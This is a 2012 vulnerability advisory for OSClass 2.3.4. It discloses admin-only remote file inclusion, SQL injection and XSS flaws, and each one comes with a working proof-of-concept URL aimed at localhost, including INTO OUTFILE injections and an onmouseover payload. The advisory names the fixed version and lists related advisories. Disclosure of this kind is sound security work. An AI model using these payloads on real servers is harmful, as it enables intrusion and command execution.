Multiple vulnerabilities in OSClass



Advisory ID: CSA-12003
Title: Multiple vulnerabilities in OSClass
Product: OSClass
Version: 2.3.4 and probably prior
Vendor: osclass.org
Vulnerability type: SQL injection, XSS, Remote file inclusion
Vendor notification: 2012-01-12
Public disclosure: 2012-01-27


OSClass version 2.3.4 and probably below suffers from multiple vulnerabilities:


1) Remote file inclusion in osc_downloadFile(). This vuln allows an attacker to put an arbitrary file (ie a melicious php script) on the server under the www root so it's possible to execute shell commands with the previleges of the webserver
An attacker must be logged as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php

http://127.0.0.1/osclass/oc-content/downloads/tmp.php



2) SQL injection in admin's ajax interface when performing the "edit_category_post" action. The GET parameted id is not sanitized.
An attacker must be logged as admin to exploit this vulnerability; gpc_magic_quotes must be off

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201



3) SQL injection in admin's ajax interface when performing the "enable_category" action. The GET parameted id is not sanitized.
An attacker must be logged as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201

(id must be a valid subcategory id - in this case gpc_magic_quotes can be on)



4) XSS in admin's' ajax interface. The GET parameted id is not sanitized.
An attacker must be logged as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E

(id must be a valid category id)


Solution

upgrade to OSClass 2.3.5

http://osclass.org/2012/01/16/osclass-2-3-5/



Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@xxxxxxxxx



Relevant Pages

  • Php-Nuke:users and admins password hashes vulnerability
    ... An attacker can obtain password hashes for users and admins, using a particular SQL injection with cookies. ... To get the password hash of an user, the attacker just needs a valid account... ... To get the password hash of an admin, the attacker only needs to know the name of that admin, and needs that the Web_Links module should be active and with at least one link: NOTE: The attacker doesn't need a valid account, and can exploit the bug even if the Web_Links module is active only for registered members... ... This one is to check the user vulnerability: <?php //Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, ...
    (Bugtraq)
  • [NT] Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (MS06-037)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution ... an attacker who successfully exploited this ... vulnerability could take complete control of the client workstation. ...
    (Securiteam)
  • [NT] Vulnerabilities in Graphics Rendering Engine Allows Code Execution (MS05-053)
    ... formats that could allow remote code execution or on an affected system. ... A remote code execution vulnerability exists in the rendering of Windows ... An attacker who successfully exploited this vulnerability could take ... E-mail messages that are viewed in plain text format will not contain ...
    (Securiteam)
  • [NEWS] Unchecked Buffer in Internet Explorer and Office for Mac Can Cause Code to Execute
    ... security vulnerability results because an attacker can levy a buffer ... The AppleScript would have to already be present on ... Unchecked Buffer in HTML Element: ...
    (Securiteam)
  • SecurityFocus Microsoft Newsletter #259
    ... MICROSOFT VULNERABILITY SUMMARY ... FL Studio FLP File Processing Heap Overflow Vulnerability 4. ... wzdftpd is affected by a remote arbitrary command execution vulnerability. ... allowing a remote attacker to supply format specifiers ...
    (Focus-Microsoft)